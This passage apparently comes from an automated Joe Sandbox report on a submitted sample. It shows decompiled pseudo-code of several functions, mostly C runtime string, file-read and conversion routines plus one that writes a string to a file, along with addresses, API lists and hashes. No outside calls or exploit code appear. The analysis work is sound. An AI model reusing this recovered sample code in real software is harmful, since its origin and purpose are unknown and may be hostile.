							_t132 =  *_t136 + (_t116 + _t116 * 2) * 8;
							if(_t112 != 0) {
								 *((intOrPtr*)(_t112 + 0x14)) = 0xf;
								 *((intOrPtr*)(_t112 + 0x10)) = 0;
								 *_t112 = 0;
								if( *((intOrPtr*)(_t132 + 0x14)) >= 0x10) {
									 *_t112 =  *_t132;
									 *_t132 = 0;
								} else {
									_t107 =  *((intOrPtr*)(_t132 + 0x10)) + 1;
									if( *((intOrPtr*)(_t132 + 0x10)) + 1 != 0) {
										E004205A0(_t112, _t132, _t107);
										_t139 = _t139 + 0xc;
									}
								}
								 *((intOrPtr*)(_t112 + 0x10)) =  *((intOrPtr*)(_t132 + 0x10));
								 *((intOrPtr*)(_t112 + 0x14)) =  *((intOrPtr*)(_t132 + 0x14));
								 *((intOrPtr*)(_t132 + 0x14)) = 0xf;
								 *((intOrPtr*)(_t132 + 0x10)) = 0;
								 *_t132 = 0;
							}
							goto L36;
						}
						_t123 = 0;
						goto L18;
						L36:
						 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 0x18;
						_v8 = 1;
						if(_v36 >= 0x10) {
							L00422587(_v56);
							_t139 = _t139 + 4;
						}
						_t89 =  >=  ? _a28 :  &_a28;
						_push( >=  ? _a28 :  &_a28);
						_push(0);
						_t82 = E00421B3B();
						_t129 = _t82;
						_t139 = _t139 + 8;
					} while (_t129 != 0);
					goto L39;
				}
				_t132 = _t82;
				if(_t82 == _t112) {
					L9:
					_t82 = L00422587(_t82);
					_t139 = _t139 + 4;
					goto L10;
				} else {
					do {
						if( *((intOrPtr*)(_t132 + 0x14)) >= 0x10) {
							L00422587( *_t132);
							_t139 = _t139 + 4;
						}
						 *((intOrPtr*)(_t132 + 0x14)) = 0xf;
						 *((intOrPtr*)(_t132 + 0x10)) = 0;
						 *_t132 = 0;
						_t132 = _t132 + 0x18;
					} while (_t132 != _t112);
					_t82 = _v20;
					goto L9;
				}
			}

0x0040ecb3
0x0040ecb5
0x0040ecc0
0x0040ecc1
0x0040ecc8
0x0040eccd
0x0040ecce
0x0040ecd0
0x0040ecd7
0x0040ecd9
0x0040ecdb
0x0040ece3
0x0040ece5
0x0040ece7
0x0040ece9
0x0040ecec
0x0040ecf3
0x0040ecf6
0x0040ecf6
0x0040ecfd
0x0040ed03
0x0040ed44
0x0040ed48
0x0040eefc
0x0040ef00
0x0040ef05
0x0040ef0a
0x0040ef0a
0x0040ef11
0x0040ef18
0x0040ef1f
0x0040ef23
0x0040ef28
0x0040ef2d
0x0040ef35
0x0040ef40
0x0040ef40
0x0040ed58
0x0040ed60
0x0040ed61
0x0040ed65
0x0040ed66
0x0040ed6b
0x0040ed6d
0x0040ed72
0x00000000
0x00000000
0x0040ed80
0x0040ed83
0x0040ed8a
0x0040ed91
0x0040ed95
0x0040ed9b
0x0040ed9d
0x0040ed9d
0x0040eda0
0x0040eda0
0x0040eda2
0x0040eda3
0x0040eda7
0x0040eda9
0x0040eda9
0x0040edab
0x0040edae
0x0040edb3
0x0040edba
0x0040edbf
0x0040ee58
0x0040ee5b
0x0040ee60
0x0040ee60
0x0040ee65
0x0040ee6a
0x0040ee6c
0x0040ee73
0x0040ee7a
0x0040ee81
0x0040ee9c
0x0040ee9e
0x0040ee83
0x0040ee86
0x0040ee87
0x0040ee8f
0x0040ee94
0x0040ee94
0x0040ee87
0x0040eea8
0x0040eeae
0x0040eeb1
0x0040eeb8
0x0040eebf
0x0040eebf
0x00000000
0x0040ee6a
0x0040edc5
0x0040edc7
0x0040edcc
0x00000000
0x00000000
0x0040edd2
0x0040ede3
0x0040ede8
0x0040eded
0x0040eded
0x0040edf7
0x0040edfa
0x0040edff
0x0040ee05
0x0040ee0c
0x0040ee13
0x0040ee1a
0x0040ee31
0x0040ee33
0x0040ee1c
0x0040ee1f
0x0040ee20
0x0040ee25
0x0040ee2a
0x0040ee2a
0x0040ee20
0x0040ee3c
0x0040ee42
0x0040ee45
0x0040ee4c
0x0040ee53
0x0040ee53
0x00000000
0x0040edff
0x0040ed97
0x00000000
0x0040eec3
0x0040eec3
0x0040eec7
0x0040eecf
0x0040eed4
0x0040eed9
0x0040eed9
0x0040eee3
0x0040eee7
0x0040eee8
0x0040eeea
0x0040eeef
0x0040eef1
0x0040eef4
0x00000000
0x0040ed80
0x0040ed05
0x0040ed09
0x0040ed3b
0x0040ed3c
0x0040ed41
0x00000000
0x0040ed0b
0x0040ed10
0x0040ed14
0x0040ed18
0x0040ed1d
0x0040ed1d
0x0040ed20
0x0040ed27
0x0040ed2e
0x0040ed31
0x0040ed34
0x0040ed38
0x00000000
0x0040ed38

APIs

_strtok.LIBCMT ref: 0040ED66
_memmove.LIBCMT ref: 0040EE25

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: _memmove_strtok
String ID:
API String ID: 3446180046-0
Opcode ID: e411074e57e557179ac6fcd4cc2da6591e65d16c34a320eb182a3059363ce490
Instruction ID: d0e58e2a66e8e3875a5229d26ee444e1e0210206766639419d48370c530ec9d7
Opcode Fuzzy Hash: e411074e57e557179ac6fcd4cc2da6591e65d16c34a320eb182a3059363ce490
Instruction Fuzzy Hash: 7F81B07160020AEFDB14DF59D98079ABBF1FF14304F54492EE40567381D3BAAAA4CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00422130 Relevance: 6.2, APIs: 4, Instructions: 163
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E00422130(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				char* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __esi;
				signed int _t74;
				char _t81;
				signed int _t86;
				signed int _t88;
				signed int _t91;
				signed int _t94;
				signed int _t97;
				signed int _t98;
				char* _t99;
				signed int _t100;
				signed int _t102;
				signed int _t103;
				signed int _t104;
				char* _t110;
				signed int _t113;
				signed int _t117;
				signed int _t119;
				void* _t120;

				_t99 = _a4;
				_t74 = _a8;
				_v8 = _t99;
				_v12 = _t74;
				if(_a12 == 0) {
					L5:
					return 0;
				}
				_t97 = _a16;
				if(_t97 == 0) {
					goto L5;
				}
				_t124 = _t99;
				if(_t99 != 0) {
					_t119 = _a20;
					__eflags = _t119;
					if(_t119 == 0) {
						L9:
						__eflags = _a8 - 0xffffffff;
						if(_a8 != 0xffffffff) {
							_t74 = E0042B420(_t99, 0, _a8);
							_t120 = _t120 + 0xc;
						}
						__eflags = _t119;
						if(__eflags == 0) {
							goto L3;
						} else {
							__eflags = _t97 - (_t74 | 0xffffffff) / _a12;
							if(__eflags > 0) {
								goto L3;
							}
							L13:
							_t117 = _a12 * _t97;
							__eflags =  *(_t119 + 0xc) & 0x0000010c;
							_t98 = _t117;
							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
								_t100 = 0x1000;
							} else {
								_t100 =  *(_t119 + 0x18);
							}
							_v16 = _t100;
							__eflags = _t117;
							if(_t117 == 0) {
								L41:
								return _a16;
							} else {
								do {
									__eflags =  *(_t119 + 0xc) & 0x0000010c;
									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
										L24:
										__eflags = _t98 - _t100;
										if(_t98 < _t100) {
											_t81 = E0042B2F2(_t98, _t119, _t119);
											__eflags = _t81 - 0xffffffff;
											if(_t81 == 0xffffffff) {
												L46:
												return (_t117 - _t98) / _a12;
											}
											_t102 = _v12;
											__eflags = _t102;
											if(_t102 == 0) {
												L42:
												__eflags = _a8 - 0xffffffff;
												if(__eflags != 0) {
													E0042B420(_a4, 0, _a8);
												}
												 *((intOrPtr*)(E00425208(__eflags))) = 0x22;
												L4:
												E004242D2();
												goto L5;
											}
											_t110 = _v8;
											 *_t110 = _t81;
											_t98 = _t98 - 1;
											_v8 = _t110 + 1;
											_t103 = _t102 - 1;
											__eflags = _t103;
											_v12 = _t103;
											_t100 =  *(_t119 + 0x18);
											_v16 = _t100;
											goto L40;
										}
										__eflags = _t100;
										if(_t100 == 0) {
											_t86 = 0x7fffffff;
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t86 = _t98;
											}
										} else {
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t44 = _t98 % _t100;
												__eflags = _t44;
												_t113 = _t44;
												_t91 = _t98;
											} else {
												_t113 = 0x7fffffff % _t100;
												_t91 = 0x7fffffff;
											}
											_t86 = _t91 - _t113;
										}
										__eflags = _t86 - _v12;
										if(_t86 > _v12) {
											goto L42;
										} else {
											_push(_t86);
											_push(_v8);
											_push(E0042816B(_t119));
											_t88 = E0042B5C4();
											_t120 = _t120 + 0xc;
											__eflags = _t88;
											if(_t88 == 0) {
												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
												goto L46;
											}
											__eflags = _t88 - 0xffffffff;
											if(_t88 == 0xffffffff) {
												L45:
												_t64 = _t119 + 0xc;
												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
												__eflags =  *_t64;
												goto L46;
											}
											_t98 = _t98 - _t88;
											__eflags = _t98;
											L36:
											_v8 = _v8 + _t88;
											_v12 = _v12 - _t88;
											_t100 = _v16;
											goto L40;
										}
									}
									_t94 =  *(_t119 + 4);
									_v20 = _t94;
									__eflags = _t94;
									if(__eflags == 0) {
										goto L24;
									}
									if(__eflags < 0) {
										goto L45;
									}
									__eflags = _t98 - _t94;
									if(_t98 < _t94) {
										_t94 = _t98;
										_v20 = _t98;
									}
									_t104 = _v12;
									__eflags = _t94 - _t104;
									if(_t94 > _t104) {
										goto L42;
									} else {
										E00429544(_v8, _t104,  *_t119, _t94);
										_t88 = _v20;
										_t120 = _t120 + 0x10;
										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
										_t98 = _t98 - _t88;
										 *_t119 =  *_t119 + _t88;
										goto L36;
									}
									L40:
									__eflags = _t98;
								} while (_t98 != 0);
								goto L41;
							}
						}
					}
					_t74 = (_t74 | 0xffffffff) / _a12;
					__eflags = _t97 - _t74;
					if(_t97 <= _t74) {
						goto L13;
					}
					goto L9;
				}
				L3:
				 *((intOrPtr*)(E00425208(_t124))) = 0x16;
				goto L4;
			}

0x0042213a
0x0042213d
0x00422143
0x00422146
0x00422149
0x00422166
0x00000000
0x00422166
0x0042214b
0x00422150
0x00000000
0x00000000
0x00422152
0x00422154
0x0042216f
0x00422172
0x00422174
0x00422182
0x00422182
0x00422186
0x0042218e
0x00422193
0x00422193
0x00422196
0x00422198
0x00000000
0x0042219a
0x004221a2
0x004221a4
0x00000000
0x00000000
0x004221a6
0x004221a9
0x004221ac
0x004221b3
0x004221b5
0x004221bc
0x004221b7
0x004221b7
0x004221b7
0x004221c1
0x004221c4
0x004221c6
0x004222af
0x00000000
0x004221cc
0x004221cc
0x004221cc
0x004221d3
0x00422214
0x00422214
0x00422216
0x00422281
0x00422287
0x0042228a
0x004222e1
0x00000000
0x004222e7
0x0042228c
0x0042228f
0x00422291
0x004222b7
0x004222b7
0x004222bb
0x004222c5
0x004222ca
0x004222d2
0x00422161
0x00422161
0x00000000
0x00422161
0x00422293
0x00422296
0x00422299
0x0042229a
0x0042229d
0x0042229d
0x0042229e
0x004222a1
0x004222a4
0x00000000
0x004222a4
0x00422218
0x0042221a
0x0042223e
0x00422243
0x00422249
0x0042224b
0x0042224b
0x0042221c
0x0042221e
0x00422224
0x00422236
0x00422236
0x00422236
0x00422238
0x00422226
0x0042222b
0x0042222d
0x0042222d
0x0042223a
0x0042223a
0x0042224d
0x00422250
0x00000000
0x00422252
0x00422252
0x00422253
0x0042225d
0x0042225e
0x00422263
0x00422266
0x00422268
0x004222ef
0x00000000
0x004222ef
0x0042226e
0x00422271
0x004222dd
0x004222dd
0x004222dd
0x004222dd
0x00000000
0x004222dd
0x00422273
0x00422273
0x00422275
0x00422275
0x00422278
0x0042227b
0x00000000
0x0042227b
0x00422250
0x004221d5
0x004221d8
0x004221db
0x004221dd
0x00000000
0x00000000
0x004221df
0x00000000
0x00000000
0x004221e5
0x004221e7
0x004221e9
0x004221eb
0x004221eb
0x004221ee
0x004221f1
0x004221f3
0x00000000
0x004221f9
0x00422200
0x00422205
0x00422208
0x0042220b
0x0042220e
0x00422210
0x00000000
0x00422210
0x004222a7
0x004222a7
0x004222a7
0x00000000
0x004221cc
0x004221c6
0x00422198
0x0042217b
0x0042217e
0x00422180
0x00000000
0x00000000
0x00000000
0x00422180
0x00422156
0x0042215b
0x00000000

APIs

_memset.LIBCMT ref: 0042218E
__read_nolock.LIBCMT ref: 0042225E
__filbuf.LIBCMT ref: 00422281
_memset.LIBCMT ref: 004222C5

Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock
String ID:
API String ID: 2974526305-0
Opcode ID: 2663944f2ecd2356e6bc0f9128c733698aaf16daf3cf10d514d26d316ebfdedf
Instruction ID: 8e6e0b0b404069c1ace538d88af1fa9e5aae20a8402e44ab6f3f0d96efeb0f41
Opcode Fuzzy Hash: 2663944f2ecd2356e6bc0f9128c733698aaf16daf3cf10d514d26d316ebfdedf
Instruction Fuzzy Hash: 9A51D830B00225FBCB148E69AA40A7F77B1AF11320F94436FF825963D0D7B99D61CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0043C677 Relevance: 6.1, APIs: 4, Instructions: 97
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0043C677(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				int _v20;
				int _t35;
				int _t38;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E0042019C( &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E00422BCC( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t59 = 1;
							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							if(__eflags != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E00425208(__eflags);
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							__eflags = _t50 -  *(_t59 + 0x74);
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(__eflags == 0) {
								goto L20;
							}
							L18:
							_t59 =  *(_t59 + 0x74);
							goto L21;
						}
						__eflags = _t50 -  *(_t59 + 0x74);
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}

0x0043c67f
0x0043c684
0x0043c69e
0x00000000
0x0043c69e
0x0043c686
0x0043c68b
0x00000000
0x00000000
0x0043c690
0x0043c6ad
0x0043c6b2
0x0043c6b5
0x0043c6bc
0x0043c6db
0x0043c6e2
0x0043c6e4
0x0043c728
0x0043c737
0x0043c745
0x0043c747
0x0043c757
0x0043c757
0x0043c75b
0x0043c75d
0x0043c760
0x0043c760
0x0043c760
0x0043c760
0x00000000
0x0043c766
0x0043c749
0x0043c749
0x0043c74e
0x0043c74e
0x0043c751
0x00000000
0x0043c751
0x0043c6e6
0x0043c6e9
0x0043c6ed
0x0043c716
0x0043c716
0x0043c719
0x0043c719
0x00000000
0x00000000
0x0043c71b
0x0043c71f
0x00000000
0x00000000
0x0043c721
0x0043c721
0x00000000
0x0043c721
0x0043c6ef
0x0043c6f2
0x00000000
0x00000000
0x0043c6f6
0x0043c709
0x0043c70f
0x0043c712
0x0043c714
0x00000000
0x00000000
0x00000000
0x0043c714
0x0043c6be
0x0043c6c1
0x0043c6c3
0x0043c6c8
0x0043c6c8
0x0043c6cd
0x00000000
0x0043c6cd
0x0043c692
0x0043c697
0x0043c69b
0x0043c69b
0x00000000

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0043C6AD
__isleadbyte_l.LIBCMT ref: 0043C6DB
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C709
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C73F

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
Instruction ID: 9bb69ce0c337472f3e835d3bfc0adb25a23875f1fe15b1d3b69bac0ae3c4b713
Opcode Fuzzy Hash: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
Instruction Fuzzy Hash: 4E31F530600206EFDB218F75CC85BBB7BA5FF49310F15542AE865A72A0D735E851DF98

Uniqueness

Uniqueness Score: -1.00%

Function 0040F0E0 Relevance: 6.1, APIs: 4, Instructions: 86
filestringCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E0040F0E0(intOrPtr* __ecx, char _a4, intOrPtr _a24) {
				struct _OVERLAPPED* _v8;
				intOrPtr _v16;
				char _v17;
				long _v24;
				intOrPtr _v28;
				char _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t23;
				intOrPtr _t25;
				void* _t31;
				intOrPtr* _t35;
				signed int _t37;
				short* _t40;
				void* _t43;
				intOrPtr* _t46;
				CHAR* _t49;
				intOrPtr _t50;
				void* _t51;
				short* _t53;

				_push(0xffffffff);
				_push(0x4caa48);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t50;
				_t51 = _t50 - 0x20;
				_push(_t31);
				_t46 = __ecx;
				_v8 = 0;
				_t22 =  >=  ? _a4 :  &_a4;
				_t23 = CreateFileW( >=  ? _a4 :  &_a4, 0x40000000, 2, 0, 2, 0x80, 0);
				_t43 = _t23;
				if(_t43 == 0xffffffff) {
					L8:
					if(_a24 >= 8) {
						_t23 = L00422587(_a4);
					}
					 *[fs:0x0] = _v16;
					return _t23;
				}
				_t53 = _t51 - 0x18;
				_v17 = 0;
				_t40 = _t53;
				 *((intOrPtr*)(_t40 + 0x14)) = 7;
				 *(_t40 + 0x10) = 0;
				 *_t40 = 0;
				if( *_t46 != 0) {
					_t35 = _t46;
					_t31 = _t35 + 2;
					do {
						_t25 =  *_t35;
						_t35 = _t35 + 2;
					} while (_t25 != 0);
					_t37 = _t35 - _t31 >> 1;
					L6:
					_push(_t37);
					E00415C10(_t31, _t40, _t43, _t46, _t46);
					E00412840( &_v48, _v17);
					_t51 = _t53 + 0x18;
					_t49 =  >=  ? _v48 :  &_v48;
					WriteFile(_t43, _t49, lstrlenA(_t49),  &_v24, 0);
					_t23 = CloseHandle(_t43);
					if(_v28 >= 0x10) {
						_t23 = L00422587(_v48);
						_t51 = _t51 + 4;
					}
					goto L8;
				}
				_t37 = 0;
				goto L6;
			}

0x0040f0e3
0x0040f0e5
0x0040f0f0
0x0040f0f1
0x0040f0f8
0x0040f0fb
0x0040f0fe
0x0040f10b
0x0040f11b
0x0040f125
0x0040f12b
0x0040f130
0x0040f1bf
0x0040f1c3
0x0040f1c8
0x0040f1cd
0x0040f1d5
0x0040f1e0
0x0040f1e0
0x0040f136
0x0040f139
0x0040f13d
0x0040f141
0x0040f148
0x0040f14f
0x0040f155
0x0040f15b
0x0040f15d
0x0040f160
0x0040f160
0x0040f163
0x0040f166
0x0040f16d
0x0040f16f
0x0040f16f
0x0040f173
0x0040f17e
0x0040f183
0x0040f190
0x0040f1a1
0x0040f1a8
0x0040f1b2
0x0040f1b7
0x0040f1bc
0x0040f1bc
0x00000000
0x0040f1b2
0x0040f157
0x00000000

APIs

CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0040F125
lstrlenA.KERNEL32(?,?,00000000), ref: 0040F198
WriteFile.KERNEL32(00000000,?,00000000), ref: 0040F1A1
CloseHandle.KERNEL32(00000000), ref: 0040F1A8

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWritelstrlen
String ID:
API String ID: 1421093161-0
Opcode ID: b3abc9572091bca9125f21951a8d684c8c7a697cb0b84fa965d2ba6b520d2649
Instruction ID: 4e0a1a2928686de7afe91093b481d52cb6f90b47dd46c4e49af8be4df8d63ea4
Opcode Fuzzy Hash: b3abc9572091bca9125f21951a8d684c8c7a697cb0b84fa965d2ba6b520d2649
Instruction Fuzzy Hash: DF31F531A00104EBDB14AF68DC4ABEE7B78EB05704F50813EF9056B6C0D7796A89CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004409B9 Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004409B9(void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00440F28(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00440A5D(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E004411DC(__edx, __esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E004410FD(__edx, __esi, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x004409bc
0x004409c2
0x00440a35
0x00000000
0x004409c9
0x004409c9
0x004409cc
0x004409e7
0x004409ea
0x00440a0a
0x00440a1c
0x004409ec
0x004409ec
0x004409ef
0x00000000
0x004409f1
0x00440a03
0x00440a03
0x004409ef
0x00440a3a
0x00440a3e
0x004409ce
0x004409e6
0x004409e6
0x004409cc

APIs

__cftof_l.LIBCMT ref: 004409DD

Part of subcall function 004410FD: __fltout2.LIBCMT ref: 00441126

__cftog_l.LIBCMT ref: 00440A03
__cftoe_l.LIBCMT ref: 00440A35

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
Instruction ID: 47779ad8523d68e9f2e2bd7ddfa488ab055a33a4313e19cc57a45add4f9be60e
Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
Instruction Fuzzy Hash: B6014E7240014EBBDF125E85CC428EE3F62BB29354F58841AFE1968131C63AC9B2AB85

Uniqueness

Uniqueness Score: -1.00%

Function 004127A0 Relevance: 6.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E004127A0(WCHAR* __ecx, void* __edx) {
				int _v8;
				void* __ebx;
				void* __edi;
				short* _t12;
				void* _t17;
				char* _t18;
				int _t21;

				_t16 = __edx;
				_push(__ecx);
				_t12 = __ecx;
				_push(_t17);
				_t5 =  !=  ? 0xfde9 : 0;
				_v8 =  !=  ? 0xfde9 : 0;
				_t2 = lstrlenW(__ecx) + 1; // 0x1
				_t21 = _t2;
				_t18 = E00420C62(_t12, _t16, _t17, _t21);
				E0042B420(_t18, 0, _t21);
				WideCharToMultiByte(_v8, 0, _t12, 0xffffffff, _t18, _t21, 0, 0);
				return _t18;
			}

0x004127a0
0x004127a3
0x004127a7
0x004127b1
0x004127b2
0x004127b6
0x004127bf
0x004127bf
0x004127c9
0x004127ce
0x004127e4
0x004127f2

APIs

lstrlenW.KERNEL32 ref: 004127B9
_malloc.LIBCMT ref: 004127C3

Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(005C0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5

_memset.LIBCMT ref: 004127CE
WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 004127E4

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
String ID:
API String ID: 2824100046-0
Opcode ID: 09908775b5e5bc8df4309979956ae60541863bcf2bd73145411733e911d939f3
Instruction ID: 750470dcacb0e1f47d667e481962336cdcd22eeec5e51d764cc358051e51787a
Opcode Fuzzy Hash: 09908775b5e5bc8df4309979956ae60541863bcf2bd73145411733e911d939f3
Instruction Fuzzy Hash: C6F02735701214BBE72066669C8AFBB769DEB86764F100139F608E32C2E9512D0152F9

Uniqueness

Uniqueness Score: -1.00%

Function 00414920 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 319
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00414920(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, signed int _a4, intOrPtr _a8, intOrPtr* _a12, signed int _a16, intOrPtr _a20) {
				intOrPtr _v8;
				signed int _v12;
				signed int _t128;
				intOrPtr _t134;
				intOrPtr* _t137;
				intOrPtr _t140;
				signed int _t144;
				intOrPtr* _t146;
				intOrPtr _t149;
				intOrPtr _t153;
				intOrPtr _t158;
				intOrPtr _t163;
				intOrPtr _t164;
				intOrPtr* _t165;
				intOrPtr _t167;
				intOrPtr _t171;
				intOrPtr _t191;
				signed int _t194;
				intOrPtr* _t195;
				intOrPtr _t196;
				intOrPtr* _t200;
				signed int _t203;
				intOrPtr _t204;
				intOrPtr* _t205;
				intOrPtr _t207;
				intOrPtr* _t208;
				intOrPtr* _t210;
				signed int _t212;
				intOrPtr* _t213;
				intOrPtr* _t217;
				intOrPtr* _t221;
				intOrPtr* _t223;
				intOrPtr* _t224;
				signed int _t226;
				intOrPtr* _t231;
				void* _t232;
				intOrPtr* _t235;
				intOrPtr* _t237;
				intOrPtr* _t240;
				intOrPtr* _t241;
				signed int _t244;
				signed int _t246;
				signed int _t247;
				intOrPtr* _t251;
